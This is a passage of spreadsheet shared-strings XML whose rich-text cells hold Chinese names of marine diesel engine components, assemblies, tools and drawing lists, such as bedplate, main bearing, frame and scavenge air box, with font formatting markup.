        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>启动空气分配器齿轮箱</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>推拉杆端</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>启动空气分配器轴</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>分配器盖</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>灭火支撑</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机上管子</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>变更说明</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺帽</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺杆</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液位指示器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺旋线圈</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>恒温阀元件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>温度计支架</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机座中间块</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>恒温阀</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电磁阀</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>集油池</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>泄漏警报</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>放气滤器安装</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>海水冷却</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>柴油机顶撑</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>侧锲块</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>端锲块</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管子图</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>中央冷却</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>1</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>桥楼控制</t>
    </r>
  </si>
  <si>
    <r>
      <t>PTO</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>系统</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安装图</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>A</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安装图</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>B</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>辅助设备</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>改图</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>备件外形图</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>备件安装</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主清单</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>A</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主清单</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>B</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主清单</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>C</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管件布置清单</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>工具清单</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>供应商图</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机舱布置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>柴油机安装</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机座中间</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机座前中端</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机座后中端焊接</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>面板</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>非标主轴承</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油底壳前端</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油底壳后端</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>测量管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油吸油管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液位报警</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>短机座</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>测量尺支架</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主轴瓦提升工具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主轴承液压拉伸器组件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>钻床管子</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>钻床基座定位孔</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>钻床滑轮轨道</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>底座</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>焊接支架</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>锥体支架</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>定位杆</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>弹性底座安装</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液位报警安装</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油底壳焊接</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油滤器支架</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>焊接底座</t>
    </r>
  </si>
  <si>
    <r>
      <t>PMI</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>系统接线箱</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <t>A</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>型架总成</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>前端框架</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>后端横梁</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>铰链安装</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>盖子前端</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>后端机架</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带主轴承的机架</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机架前端加工</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机架后端加工</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>中间板</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机架中段</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>贯穿螺栓支撑块</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扫气箱</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扫气箱总成</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>密封环安装</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>护套</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主轴承安装</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>护套安装</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>聚四氟乙烯环</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机架装配</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压拉伸工具定位</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主轴承盖拆卸工具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机架起吊</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>立铣</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管件液压螺帽</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压螺帽备件</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机架</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主轴承</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机架成形和定位工具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>热传感器管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带管底的盖子</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>链传动机构下部</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带护套的中间框架</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
